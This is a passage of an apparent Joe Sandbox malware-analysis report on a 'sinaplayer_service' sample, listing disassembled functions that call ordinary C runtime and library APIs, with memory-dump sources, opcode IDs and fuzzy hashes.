                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$D@std@@@std@@FreeLibraryU?$char_traits@Unlock@?$basic_streambuf@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 801975376-0
                                                                                                                                                                                                    • Opcode ID: b9d80c0f1244eaa7f77036080a599bcc3a1364dd1b9e083116947eda99dd8260
                                                                                                                                                                                                    • Instruction ID: 35666ff53decc187174773665dc366c4930debcce3fc30e459fabc6ac197aeab
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9d80c0f1244eaa7f77036080a599bcc3a1364dd1b9e083116947eda99dd8260
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 820144B1600B02AFDB5AEF24D845716B7B4BF15300F0606A8E40987AA0E731F8A4CBE1
                                                                                                                                                                                                    Function 00371AAE Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?setstate@?$basic_ios@_?uncaught_exception@std@@Osfx@?$basic_ostream@U?$char_traits@_W@std@@@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3064670732-0
                                                                                                                                                                                                    • Opcode ID: 829fbe009128c9101d45d1cc51b7428e13bc8859c618b4a8d55284bdf201dbef
                                                                                                                                                                                                    • Instruction ID: 456813bbe8f8e2133fae40303d504c3ef51a0a2964797c7704d0b1ae934e1064
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 829fbe009128c9101d45d1cc51b7428e13bc8859c618b4a8d55284bdf201dbef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B015A39700205CFCB14DF58D999BADBBB5FF88320F1885A9D80A9B391CB35E845CB50
                                                                                                                                                                                                    Function 003763EB Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00376402
                                                                                                                                                                                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 0037640F
                                                                                                                                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 0037641C
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 0037642C
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376440
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?setstate@?$basic_ios@_?uncaught_exception@std@@Osfx@?$basic_ostream@U?$char_traits@_W@std@@@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3064670732-0
                                                                                                                                                                                                    • Opcode ID: 79f55296ea3c163bcac86c2deac64f6d3ef5bb29dcf0b87171206a1083bd350e
                                                                                                                                                                                                    • Instruction ID: 5320a695415fdf9614aa1bef207b2fd47d79e2b4b8dab3f67fcf514047041f81
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79f55296ea3c163bcac86c2deac64f6d3ef5bb29dcf0b87171206a1083bd350e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 940125347002058FCB14DF54D999BA8BBB5FF89310F2485A9D84AAB391CB36ED05CB50
                                                                                                                                                                                                    Function 6C57C9B5 Relevance: 7.5, APIs: 5, Instructions: 39COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _control87.MSVCR120(00000001,?,00000000,?,6C5CCAB9,00000000,00010000,00030000,?,6C5B0802,?,6C57CCEB,?,?,6C57CD94,00000000), ref: 6C57C9E1
                                                                                                                                                                                                    • _control87.MSVCR120(00000000,00000000,00000000,?,6C5CCAB9,00000000,00010000,00030000,?,6C5B0802,?,6C57CCEB,?,?,6C57CD94,00000000), ref: 6C5B14C2
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6C5CCAB9,00000000,00010000,00030000,?,6C5B0802,?,6C57CCEB,?,?,6C57CD94,00000000), ref: 6C5B14CB
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,6C5CCAB9,00000000,00010000,00030000,?,6C5B0802,?,6C57CCEB,?,?,6C57CD94,00000000), ref: 6C5B14D5
                                                                                                                                                                                                    • _control87.MSVCR120(00000001,?,00000000,?,6C5CCAB9,00000000,00010000,00030000,?,6C5B0802,?,6C57CCEB,?,?,6C57CD94,00000000), ref: 6C5B14E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _control87$_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1498936549-0
                                                                                                                                                                                                    • Opcode ID: b8281eb09a1cbd4dd0ead9bc02e2e7ab9cc2ae18aa67bca1d8c24307461bbb46
                                                                                                                                                                                                    • Instruction ID: eec4fb812e43bcafe5b5be16068212b8d76c6d19eaa682d7863955db6aa99620
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8281eb09a1cbd4dd0ead9bc02e2e7ab9cc2ae18aa67bca1d8c24307461bbb46
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23F0F033648714DBD7286F65AC12B8A77A4AF40B24F10461DF819ABB80CBB0F88042E4
                                                                                                                                                                                                    Function 6C5D0A89 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5D0A96
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5D0AA1
                                                                                                                                                                                                      • Part of subcall function 6C5F4670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6C5CB412,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5F4677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5D0ABF
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5D0ACA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    • Opcode ID: 475424ba0e096a867894ab4a8339ffc3ab863acb4e767b1e4831fecb20219b77
                                                                                                                                                                                                    • Instruction ID: 4a300f2465734e52f0fde96a56221f3e02b94a19787687fe1ebbb6f1bc498d6b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 475424ba0e096a867894ab4a8339ffc3ab863acb4e767b1e4831fecb20219b77
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DF068315003499ADF059F79DC405D77368EFC176CB168297E4288BBA0EB31ED4587B5
                                                                                                                                                                                                    Function 6C5D6C01 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5D6C18
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5D6C23
                                                                                                                                                                                                      • Part of subcall function 6C5F4670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6C5CB412,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5F4677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5D6C3D
                                                                                                                                                                                                    • __localtime32_s.LIBCMT(?,?), ref: 6C5D6C4F
                                                                                                                                                                                                      • Part of subcall function 6C5D7269: _errno.MSVCR120(?,?,6C5D6C54,?,?), ref: 6C5D7283
                                                                                                                                                                                                      • Part of subcall function 6C5D7269: _invalid_parameter_noinfo.MSVCR120(?,?,6C5D6C54,?,?), ref: 6C5D728D
                                                                                                                                                                                                    • asctime.MSVCR120(?), ref: 6C5D6C5E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo$__localtime32_s_invalid_parameterasctime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4154182036-0
                                                                                                                                                                                                    • Opcode ID: df4aa6814420c1295a084dfac9ade739fbedbef24157fbf8a15d2f32bce46c7f
                                                                                                                                                                                                    • Instruction ID: 87d7e774b30bc9f29abadc7296f7d1d9a67e8a05103fbfe51dac2a6f26640e65
                                                                                                                                                                                                    • Opcode Fuzzy Hash: df4aa6814420c1295a084dfac9ade739fbedbef24157fbf8a15d2f32bce46c7f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85F06D71604308DEC704DFE9ED406CE77E8DF59318F020D56D804DBA60EF34A8498B29
                                                                                                                                                                                                    Function 00379EB0 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000004), ref: 00379EB7
                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002), ref: 00379EC9
                                                                                                                                                                                                    • abort.MSVCR120 ref: 00379EE1
                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00379F00
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00379F07
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@??3@InitializeUninitializeabort
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4233853893-0
                                                                                                                                                                                                    • Opcode ID: 8b883fc77ee758d2a62f62cd3caf5f7f8a8ad852283ada5c868b496ddcfa9e1f
                                                                                                                                                                                                    • Instruction ID: 9dd94a5b17692035332d610a5cceb880798b47cfd301738fe355577fd3e0d159
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b883fc77ee758d2a62f62cd3caf5f7f8a8ad852283ada5c868b496ddcfa9e1f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFF0BBB2601361ABD7339BA19885B96F658FB04752F064337EE095A240C7755810C7F1
                                                                                                                                                                                                    Function 6C5D0B7E Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5D0B88
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5D0B93
                                                                                                                                                                                                      • Part of subcall function 6C5F4670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6C5CB412,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5F4677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5D0BB7
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5D0BC2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    • Opcode ID: 6d6395948eedd5649a624c3172034b6550d85d7bc18a98dec504bf27fb883ff1
                                                                                                                                                                                                    • Instruction ID: cf7a64a311661b6f52cc212103e729dbbc311530f5aa9b4216c06b0282e3fa36
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d6395948eedd5649a624c3172034b6550d85d7bc18a98dec504bf27fb883ff1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5F0B430549344C6FA046F7E9C009AF7324AFC137CB118656E4288BF90DB71AC4086B9
                                                                                                                                                                                                    Function 0038FA10 Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,0038E770), ref: 0038FA21
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000008,00000000,?,0038E770), ref: 0038FA2B
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000000,00000000,?,0038E770), ref: 0038FA37
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0038FA3D
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038FA48
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalDeleteFreeLibrarySection$??3@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2236057424-0
                                                                                                                                                                                                    • Opcode ID: fd81d591892c4e6b26c117de9e2fc08e7d59a4f44313d5985525dc9bf924061f
                                                                                                                                                                                                    • Instruction ID: 594f219004f355336f2b88922f7e4c806bf2253961d70be6596c145d877311d0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd81d591892c4e6b26c117de9e2fc08e7d59a4f44313d5985525dc9bf924061f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EAF05EB2A20616ABCB05EF79EC44A46B7ECBF48310B050566E508D3A10D774F865CFD4
                                                                                                                                                                                                    Function 6C564D4B Relevance: 7.5, APIs: 5, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C564D84
                                                                                                                                                                                                    • __doserrno.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C5AEFCE
                                                                                                                                                                                                    • _errno.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C5AEFD6
                                                                                                                                                                                                    • _errno.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C5AEFE6
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C5AEFF1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2315031519-0
                                                                                                                                                                                                    • Opcode ID: fe8c6ef7abf185dec0df4e243f088a453a7545d81af1b363df2c7416acd77e3a
                                                                                                                                                                                                    • Instruction ID: 09e035e6fd6ad3e01a561d1a69228aae4f7c88cc0c7620d6f07d21fe2e9b2fa4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe8c6ef7abf185dec0df4e243f088a453a7545d81af1b363df2c7416acd77e3a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EF0B4311152148FDB099EAADC6077937789F8232DF140648E4254BFB1D7B49C458B92
                                                                                                                                                                                                    Function 00377DF0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 295stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _strlwr_s_ultoa_sstrncmp
                                                                                                                                                                                                    • String ID: file
                                                                                                                                                                                                    • API String ID: 3236609070-2359244304
                                                                                                                                                                                                    • Opcode ID: 8503a9ae27bee5f64fb1fbf4dbe03dbd56ded9bd8a6607d02f69d67a7dd4e9da
                                                                                                                                                                                                    • Instruction ID: fc7f9508711f95d0bb8ed1cf0920e2928b5595957f8bb0814837c2836937863a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8503a9ae27bee5f64fb1fbf4dbe03dbd56ded9bd8a6607d02f69d67a7dd4e9da
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76A10F70A44209AFDB32CF28C8897FEBBA9EF45310F15C05AE84D97641DB399949CB91
                                                                                                                                                                                                    Function 6C586AE2 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 6C586B72
                                                                                                                                                                                                      • Part of subcall function 6C596295: __87except.LIBCMT ref: 6C5962D0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                                                                                                    • String ID: pow
                                                                                                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                                                                                                    • Opcode ID: 9c7221229324b3ebca74fcd692b704c8b6ecbcb4c13169685875badce71faa8b
